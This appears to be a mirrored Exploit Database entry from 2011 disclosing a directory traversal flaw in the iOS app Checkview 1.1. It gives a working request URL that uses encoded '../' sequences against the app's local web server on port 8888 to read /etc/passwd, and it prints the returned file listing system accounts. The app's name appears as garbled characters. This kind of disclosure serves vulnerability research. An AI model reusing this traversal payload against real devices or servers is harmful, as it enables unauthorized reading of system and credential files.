iOS Checkview 1.1 – Directory Traversal

• Exploit Database
• 14 阅读

• 作者： kim@story
  日期： 2011-03-14
• 类别：

  • remote
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/16972/

• # Exploit Title: checkview(Ã¥ºä) v1.1 for iPhone / iPod touch, Directory Traversal
  # Date: 03/14/2011
  # Author: kim@story
  # E-Mail : kimastory [at] gmail [dot] com
  # Twitter : http://twitter.com/kimastory
  # Software Link: http://itunes.apple.com/En/app/id381116321#
  # Version: 1.1
  # Tested on: iPhone, iPod 3GS with 4.2.1 firmware
  
  # There is directory traversal vulnerability in the checkview(Ã¥ºä).
  # Exploit Testing
  
  
  http://192.168.0.18:8888/..%2F..%2F..%2F..%2F..%2F/etc/passwd
  
  
  #
  # 4.3BSD-compatable User Database
  #
  # Note that this file is not consulted for login.
  # It only exisits for compatability with 4.3BSD utilities.
  #
  # This file is automatically re-written by various system utilities.
  # Do not edit this file.Changes will be lost.
  #
  nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
  root:*:0:0:System Administrator:/var/root:/bin/sh
  mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
  daemon:*:1:1:System Services:/var/root:/usr/bin/false
  _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
  _securityd:*:64:64:securityd:/var/empty:/usr/bin/false
  _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
  _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
  _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false